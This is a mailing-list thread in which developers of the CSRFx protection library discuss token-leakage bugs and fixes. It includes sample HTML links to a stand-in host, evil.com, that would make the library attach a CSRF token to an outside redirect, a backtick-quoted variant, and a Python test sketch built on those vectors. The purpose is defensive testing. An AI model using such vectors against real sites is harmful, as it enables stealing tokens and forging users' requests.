Vectors


Gareth

Nov 23, 2007, 8:19:10 AM11/23/07
to CSRFx
I've started a very brief page on CSRF vectors; I shall add to this
and include my OpenID research. Please excuse the text at the moment,
it will be expanded upon and improved with examples and more thorough
descriptions. I just wanted to start the ball rolling.

Mario Heiderich

Nov 23, 2007, 4:03:20 PM11/23/07
to CSRFx
Hi!

Very nice work!

Do you think we should add the issue we discussed today too? It was
a pretty specific problem of CSRFx found by kuza55 and has meanwhile
been fixed: if a URL matching the CSRFx GET patterns is attached to
an arbitrary link as a parameter, the token would have been added to
the URL in the parameter, causing token exposure and CSRF in
combination with a redirect. Example:

<a href='http://evil.com/?redirect_to= href="/csrfx/protected/get/pattern"'>Don't click</a>

would have become...

<a href='http://evil.com/?redirect_to= href="/csrfx/protected/get/pattern?t=5765EE58576A67F669C7689768689"'>Don't click</a>

...due to a too tolerant regex.

Greetings,
.mario

Gareth

Nov 23, 2007, 5:23:46 PM11/23/07
to CSRFx
Yep, it's good to collect all vectors possible because they can be used
as a reference when testing the system.

On Nov 23, 9:03 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
> Hi!
>
> Very nice work!
>
> Do you think we should add the issue we discussed today too? It was
> a pretty specific problem of CSRFx found by kuza55 and has meanwhile
> been fixed: if a URL matching the CSRFx GET patterns is attached to
> an arbitrary link as a parameter, the token would have been added to
> the URL in the parameter, causing token exposure and CSRF in
> combination with a redirect. Example:
>
> <a href='http://evil.com/?redirect_to=href="/csrfx/protected/get/pattern"'>Don't click</a>
>
> would have become...
>
> <a href='http://evil.com/?redirect_to=href="/csrfx/protected/get/

Eduardo Vela

Nov 23, 2007, 8:21:43 PM11/23/07
to CSRFx
Hi guys.

I still think the solution made for the regexes is not enough; kuza55
just found some issues for links with backquotes, and well... there are
some third-level country code top-level domains that will allow
anyone on the same ccTLD to steal nonces... :/ I think it should match
the whole domain, and not just the last 2... maybe just changing to...

preg_match('/([\w.-]+)\//', $link, $submatches);

Greetz!!
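Added example, not CSRFx's own code: a Python sketch of the two problems raised in this thread, the over-tolerant rewrite that appends the token to the protected path wherever it appears in the markup (Mario's report, plus kuza55's backtick variant), and the host check that compares only the last two labels so any host under the same ccTLD looks like the protected site (Eduardo's point). SITE_HOST, the GET pattern, the placeholder token and the sample markup are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed values (not CSRFx's own): protected host, tokened GET pattern, placeholder token.
SITE_HOST = "www.example.co.uk"
PROTECTED = re.compile(r"/csrfx/protected/get/pattern")
TOKEN = "TOKEN_PLACEHOLDER"
# href value in double, single or backtick quotes, or unquoted (IE tolerates backticks).
HREF = re.compile(r"""href\s*=\s*(?:"([^"]*)"|'([^']*)'|`([^`]*)`|([^\s>]+))""", re.I)

# Vectors from the thread, reconstructed as constructed sample markup.
EVIL_QUOTED = ("<a href='http://evil.com/?redirect_to= "
               "href=\"/csrfx/protected/get/pattern\"'>Don't click</a>")
EVIL_BACKTICK = ("<a href=`http://evil.com/?redirect_to=<a href=\"/csrfx/protected/get/"
                 "pattern\">test</a>`>Don't click</a>")
LEGIT = '<a href="/csrfx/protected/get/pattern">go</a>'

def _href_value(m):
    return next(g for g in m.groups() if g is not None)

def tolerant_rewrite(html):
    """Too tolerant: token appended wherever the path occurs, even inside another site's link."""
    return PROTECTED.sub(lambda m: m.group(0) + "?t=" + TOKEN, html)

def strict_rewrite(html):
    """Parse each href; add the token only to relative links or links to exactly SITE_HOST."""
    def fix(m):
        url = _href_value(m)
        parts = urlsplit(url)
        host = parts.hostname or SITE_HOST  # relative link stays on our site
        if host != SITE_HOST or not PROTECTED.search(parts.path):
            return m.group(0)
        sep = "&" if parts.query else "?"
        return m.group(0).replace(url, url + sep + "t=" + TOKEN, 1)
    return HREF.sub(fix, html)

def last_two_labels_match(host):
    """Flawed host check: comparing only the last two labels equates evil.co.uk with SITE_HOST."""
    return host.split(".")[-2:] == SITE_HOST.split(".")[-2:]

def token_leaks(html):
    """True when a link to any host other than SITE_HOST carries the token."""
    for m in HREF.finditer(html):
        url = _href_value(m)
        host = urlsplit(url).hostname
        if host and host != SITE_HOST and TOKEN in url:
            return True
    return False
```

Run token_leaks on the output of each rewriter over the sample vectors: the tolerant one leaks the token into the evil.com link, the strict one leaves that link untouched and still tokens the legitimate relative link.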

kuz...@gmail.com

Nov 24, 2007, 5:44:29 AM11/24/07
to CSRFx
Regexes confuse me.....

Having said that, I think you forget IE, in the sense that I think
(without having tested this) we can still do this:

<a href=`http://evil.com/?redirect_to=<a href="/csrfx/protected/get/pattern">test</a>`>Don't click</a>

And yeah, what sirdarckcat said....

P.S. Regexes really confuse me....

Mario Heiderich

Nov 25, 2007, 4:23:26 PM11/25/07
to cs...@googlegroups.com
Hi!

I fixed the regex and it should cover unquoted and backtick-quoted markup too. But it's not tested yet. I think I will remove the only-non-ajax limitation too. More tomorrow!

Greetings,
.mario
